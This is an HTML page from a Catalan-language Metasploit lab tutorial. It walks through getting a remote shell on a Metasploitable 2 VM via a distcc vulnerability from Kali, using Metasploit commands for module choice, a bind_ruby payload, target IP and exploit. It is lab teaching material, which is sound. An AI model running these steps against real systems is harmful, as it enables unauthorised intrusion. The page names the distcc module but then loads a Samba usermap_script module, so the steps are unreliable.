<!DOCTYPE html>
<html class="writer-html5" lang="en" >
<head>
    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
      <link rel="shortcut icon" href="../../img/favicon.ico" />
    <title>Exemple Linux - MeTaSPLoiT</title>
    <link rel="stylesheet" href="../../css/theme.css" />
    <link rel="stylesheet" href="../../css/theme_extra.css" />
        <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/10.5.0/styles/github.min.css" />
        <link href="../../css/extra.css" rel="stylesheet" />
    
      <script>
        // Current page data
        var mkdocs_page_name = "Exemple Linux";
        var mkdocs_page_input_path = "tema1/exemple1.md";
        var mkdocs_page_url = null;
      </script>
    
    <script src="../../js/jquery-3.6.0.min.js" defer></script>
    <!--[if lt IE 9]>
      <script src="../../js/html5shiv.min.js"></script>
    <![endif]-->
      <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/10.5.0/highlight.min.js"></script>
      <script>hljs.initHighlightingOnLoad();</script> 
</head>

<body class="wy-body-for-nav" role="document">

  <div class="wy-grid-for-nav">
    <nav data-toggle="wy-nav-shift" class="wy-nav-side stickynav">
    <div class="wy-side-scroll">
      <div class="wy-side-nav-search">
          <a href="../.." class="icon icon-home"> MeTaSPLoiT
        </a><div role="search">
  <form id ="rtd-search-form" class="wy-form" action="../../search.html" method="get">
      <input type="text" name="q" placeholder="Search docs" title="Type search term here" />
  </form>
</div>
      </div>

      <div class="wy-menu wy-menu-vertical" data-spy="affix" role="navigation" aria-label="Navigation menu">
              <ul>
                <li class="toctree-l1"><a class="reference internal" href="../..">Home</a>
                </li>
              </ul>
              <ul>
                <li class="toctree-l1"><a class="reference internal" href="../../about/">About</a>
                </li>
              </ul>
              <p class="caption"><span class="caption-text">Exemples</span></p>
              <ul class="current">
                  <li class="toctree-l1 current"><a class="reference internal current" href="./">Exemple Linux</a>
    <ul class="current">
    </ul>
                  </li>
                  <li class="toctree-l1"><a class="reference internal" href="../exemple2/">Exemple Windows</a>
                  </li>
              </ul>
      </div>
    </div>
    </nav>

    <section data-toggle="wy-nav-shift" class="wy-nav-content-wrap">
      <nav class="wy-nav-top" role="navigation" aria-label="Mobile navigation menu">
          <i data-toggle="wy-nav-top" class="fa fa-bars"></i>
          <a href="../..">MeTaSPLoiT</a>
        
      </nav>
      <div class="wy-nav-content">
        <div class="rst-content"><div role="navigation" aria-label="breadcrumbs navigation">
  <ul class="wy-breadcrumbs">
    <li><a href="../.." class="icon icon-home" alt="Docs"></a> &raquo;</li>
          <li>Exemples &raquo;</li>
      <li>Exemple Linux</li>
    <li class="wy-breadcrumbs-aside">
    </li>
  </ul>
  <hr/>
</div>
          <div role="main" class="document" itemscope="itemscope" itemtype="http://schema.org/Article">
            <div class="section" itemprop="articleBody">
              
                <h2 id="en-aesta-practica-prepararem-la-maquina-metasploitable-2-linux-per-a-poder-realitzar-algunes-activitats-amb-metasploit-amb-posterioritat">En aesta pràctica prepararem la màquina <code>metasploitable 2 (linux)</code> per a poder realitzar algunes activitats amb Metasploit amb posterioritat.</h2>
<div class="admonition danger">
<p class="admonition-title">Perill!!</p>
<p>No proveu açò fora d'un entorn didáctic. Podrieu cometrer un delicte...</p>
</div>
<p>1 Inicia les màquines <code>Kali Linux</code> i <code>Metasploitable 2</code>. Ha d'haver-hi comunicació per xarxa local entre ambdues. </p>
<div class="admonition note">
<p class="admonition-title">Anotació</p>
<p>Tots els passos a realitzar es faran des de la màquina Kali. S'intentarà accedir a la màquina Metasploitable mitjançant una vulnerabilitat del dimoni distcc. 
distcc és un compilador del llenguatge C i C++ pensat en l'aprofitament de màquines distribuïdes en la mateixa xarxa local per a optimitzar els temps de compilació utilitzant el temps de CPU d'altres màquines que estan ocioses.</p>
</div>
<p>Kali: Búsqueda del módulo a utilizar con metasploit:</p>
<pre><code>search distcc
Selecciona el texto &quot;exploit/unix/misc/distcc_exec&quot;
</code></pre>
<p><img alt="search" src="../img/search.png" /></p>
<p>Kali: Selecciona'l:</p>
<pre><code>use exploit/multi/samba/usermap_script
</code></pre>
<p><img alt="use" src="../img/use.png" /></p>
<p>Kali: Selecciona el payload a utilitzar:</p>
<pre><code>show payloads
set payload cmd/unix/bind_ruby
</code></pre>
<p><img alt="use" src="../img/payload.png" /></p>
<p>Instructions:</p>
<pre><code>show options
set RHOSTS 10.0.2.5
(Modifica 10.0.2.5 per la IP de la màquina a atacar)
</code></pre>
<p><img alt="show" src="../img/show.png" /></p>
<pre><code>Kali: Executeu l'exploit:

exploit
A partir d'ara hem obtingut una terminal en la màquina atacada.
</code></pre>
<p><img alt="exploit" src="../img/exploit.png" /></p>
              
            </div>
          </div><footer>
    <div class="rst-footer-buttons" role="navigation" aria-label="Footer Navigation">
        <a href="../../about/" class="btn btn-neutral float-left" title="About"><span class="icon icon-circle-arrow-left"></span> Previous</a>
        <a href="../exemple2/" class="btn btn-neutral float-right" title="Exemple Windows">Next <span class="icon icon-circle-arrow-right"></span></a>
    </div>

  <hr/>

  <div role="contentinfo">
    <!-- Copyright etc -->
  </div>

  Built with <a href="https://www.mkdocs.org/">MkDocs</a> using a <a href="https://github.com/readthedocs/sphinx_rtd_theme">theme</a> provided by <a href="https://readthedocs.org">Read the Docs</a>.
</footer>
          
        </div>
      </div>

    </section>

  </div>

  <div class="rst-versions" role="note" aria-label="Versions">
  <span class="rst-current-version" data-toggle="rst-current-version">
    
    
      <span><a href="../../about/" style="color: #fcfcfc">&laquo; Previous</a></span>
    
    
      <span><a href="../exemple2/" style="color: #fcfcfc">Next &raquo;</a></span>
    
  </span>
</div>
    <script>var base_url = '../..';</script>
    <script src="../../js/theme_extra.js" defer></script>
    <script src="../../js/theme.js" defer></script>
      <script src="../../search/main.js" defer></script>
    <script defer>
        window.onload = function () {
            SphinxRtdTheme.Navigation.enable(true);
        };
    </script>

</body>
</html>
